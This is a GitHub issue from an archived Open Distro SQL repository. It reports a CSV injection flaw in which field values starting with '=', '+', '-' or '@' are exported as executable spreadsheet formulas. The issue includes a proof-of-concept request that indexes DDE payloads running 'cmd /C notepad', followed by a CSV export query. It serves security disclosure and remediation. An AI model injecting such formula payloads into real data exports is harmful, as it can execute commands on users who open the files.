Skip to content
This repository has been archived by the owner on Aug 2, 2022. It is now read-only.

CSV Injection issue #449

Closed
dai-chen opened this issue Apr 29, 2020 · 0 comments
Closed

CSV Injection issue #449

dai-chen opened this issue Apr 29, 2020 · 0 comments
Assignees
Labels
security Issues for security concern

Comments

@dai-chen
Copy link
Member

In CSV, a cell prefixed with "=" is treated as formula which could be executable. Attacker can upload document with this kind of field value to Elasticsearch. Victim downloads the CSV file and injected code may be executed after open.

PUT /userdata/user/1
{
  "=cmd|' /C notepad'!_xlbgnm.A1": "+cmd|' /C notepad'!_xlbgnm.A1",
  "-cmd|' /C notepad'!_xlbgnm.A1": "@cmd|' /C notepad'!_xlbgnm.A1"
}

POST /_opendistro/_sql?format=csv
{
  "query" : "SELECT * FROM userdata"
}
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
security Issues for security concern
Projects
None yet
Development

No branches or pull requests

1 participant